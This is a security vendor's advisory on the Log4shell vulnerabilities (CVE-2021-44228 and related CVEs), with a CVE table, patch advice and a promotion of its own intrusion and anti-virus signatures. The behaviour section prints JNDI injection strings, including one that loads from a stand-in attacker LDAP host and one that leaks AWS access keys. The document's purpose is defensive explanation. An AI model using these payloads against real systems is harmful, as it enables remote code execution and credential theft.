Hsinchu, Taiwan – Dec 19, 2021 – One of the Apache Log4shell Vulnerabilities has the CVSS score as 10. The full score of CVSS is 10 and thus this is the highest level critical. Its name is CVE-2021-44228 and means that the JNDI feature of Apache Web Server used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. Apache organization fixed it and released log4j2 version 2.15. And then, CVE-2021-45046 is found in version 2.15 soon and therefore version 2.16 is released. Again, CVE-2021-45105 is found in version 2.16 soon and 2.17 is released.

Also, CVE-2021-4104 is the vulnerability in log4j version 1.2. Although log4j version 1 is end of life already, some people may still use it and not upgrade to version 2.

CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 have some other names like log4j, log4j2, log4shell and so on. Actually log4j and log4j2 are the very popular logging tools maintained by Apache organization for sending text to be stored in log files and/or databases. The log4j (version 1) is end of life and log4j2 (version 2) is the latest. Log4shell is the more precise name for these vulnerabilities because cyber-criminals can execute remote code easily with those vulnerabilities. Whether you are using log4j version 1 or 2, you are strongly recommended to adopt the latest version of log4j2 for security reasons. At the time of writing, the version 2.17 is the latest version.

Update: The CVSS score of CVE-2021-45046 is adjusted from 3.7 to 9 on Dec 17, 2021. And another CVE-2021-45105 is found that it can be used in DoS (Denial of Service) attack.

CVE Id	CVE Description	CVSS v3 Score	Severity Level	Affected log4j Versions
CVE-2021-44228	JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.	10.0	Critical	Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0
CVE-2021-45046	It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.	9.0	Critical	Log4j2 2.15 only
CVE-2021-45105	Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups.	7.5	High	Log4j2 versions 2.0-alpha1 through 2.16.
CVE-2021-4104	JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration.	N/A	N/A	Log4j 1.2 only.

 

According to the technical report of Rapid7, many cyber-criminals in the world begin using these vulnerabilities since November, 2021.

From the technical report of Rapid7

Log4shell Behavior

CVE-2021-44228 allows an attacker to craft an LDAP request that can retrieve and run payloads on a vulnerable host. In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form “${prefix:name}”. The example is “${jndi:ldap://example.com/file}” will load data from “ldap://example.com/file” if connected to the Internet and cyber-criminal has prepared a malicious LDAP server at “example.com”.

This vulnerability also allows information leakage where the attacker can read and show data from files and environment variables on the vulnerable host using an LDAP request. Such LDAP requests can generate a DNS request leaking sensitive information for applications such as AWS, Hadoop, Postgres etc.

An example of the format of a JNDI lookup that generates an LDAP request resulting in a DNS request leaking the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY values:

${jndi:ldap://${env:AWS_ACCESS_KEY_ID}.${env:AWS_SECRET_ACCESS_KEY}.}

There are a lot of real examples about log4shell. The first one is the YouTube video of cracking the popular Minecraft game via Log4shell vulnerability from IKteam. And the second one is the cracked Tesla car via Log4shell vulnerability from ExploitWareLabs.

From IKTeam, Minecraft cracked via Log4shell vulnerability

From ExploitWareLabs, Tesla cracked via Log4shell vulnerability

Lionic’s Anti-Intrusion and Anti-Virus rules for Log4shell Vulnerabilities

Again, Lionic studied the log4shell vulnerabilities immediately and released related signature. Both Anti-Intrusion and Anti-Virus signature databases have some rules which can defend against the log4shell vulnerabilities. All Lionic security technology based products can protect against log4shell vulnerabilities after their signatures are updated to the latest version.

The following two YouTube videos prove that Lionic Pico-UTM can block the log4shell vulnerabilities.

Lionic's Log4shell demo without Pico-UTM (The attack occurred.)
Lionic's Log4shell demo with Pico-UTM (The attack is blocked.)

Partial list of Anti-Intrusion rules for Log4shell Vulnerabilities:

Rule ID	Description
8100903 ~ 8100908	Apache Log4j JNDI Injection Remote Code Execution attempt
…	…

Partial list of Anti-Virus rules for Log4shell Vulnerabilities:

Rule ID	Virus Name	Release Date
9114807219854095	Trojan.HTML.Generic.4	2021-12-16
9093020794585558	Trojan.Java.Agent.4	2021-12-16
9189618224015584	Trojan.Script.Zojfor.4	2021-12-16
9235690281452323	Trojan.Script.Zojfor.4	2021-12-16
9008999622847201	Trojan.Script.Zojfor.4	2021-12-16
9191827434065719	Trojan.Script.Zojfor.4	2021-12-16
9033340405765520	Trojan.Script.Zojfor.4	2021-12-16
9067928544323220	Trojan.Script.Zojfor.4	2021-12-16
9146325989646571	Trojan.Script.Zojfor.4	2021-12-16
9259682338799974	Trojan.Script.Zojfor.4	2021-12-16
9014239844713955	Trojan.ZIP.Zojfor.4	2021-12-16
9119691314816421	Trojan.Java.Agent.3	2021-12-16
9040875976256033	Trojan.Java.Agent.4	2021-12-15
9242430171087494	Trojan.Script.Generic.4	2021-12-15
9211518412509961	Riskware.ZIP.Generic.1	2021-12-15
9159737756054731	Trojan.Script.Generic.4	2021-12-14
9046580433934920	Trojan.Script.Zojfor.4	2021-12-14
9151855514369988	Trojan.Script.Zojfor.4	2021-12-14
…	…	…

 

Conclusion

Plenty of companies adopted Apache Web Server, Tomcat and are running many Java programs. Undoubtedly they are also using log4j2 as the logging tool. Therefore, many big companies like Amazon AWS, Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ, Cisco, NetApp and others issued the log4shell warnings to their customers. The companies adopted log4j2 are strongly recommended to upgrade their log4j2 to version 2.17 or later for defending against CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-4104. This is the best method for pulling the plug.

However, if network administrators are tired of fixing the endless stream of cybersecurity vulnerabilities, they can use the Lionic Pico-UTM as the “Virtual Bug Fix”. The administrators can take their time to wait the stable version and then upgrade. Also, please note that some security network appliances have Anti-Intrusion feature only and no Anti-virus feature. Both the Anti-Intrusion rules and Anti-Virus rules released by Lionic proved that only Anti-Intrusion feature is not enough for protection once again.

 

References:

1. Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild, https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
2. CVE-2021-44228, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
3. CVE-2021-45046, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
4. CVE-2021-45105, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
5. CVE-2021-4104, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104
6. Apache Log4j Vulnerability CVE-2021-44228 Raises widespread Concerns, https://blogs.juniper.net/en-us/security/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns
7. Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations, https://www.rapid7.com/blog/post/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/
8. The Every person’s Guide to Log4Shell, (CVE-2021-44228), https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/
9. ExploitWareLabs, https://www.facebook.com/ExWareLabs
10. Log4Shell, https://en.wikipedia.org/wiki/Log4Shell
11. Apache Log4j Security Vulnerabilities, https://logging.apache.org/log4j/2.x/security.html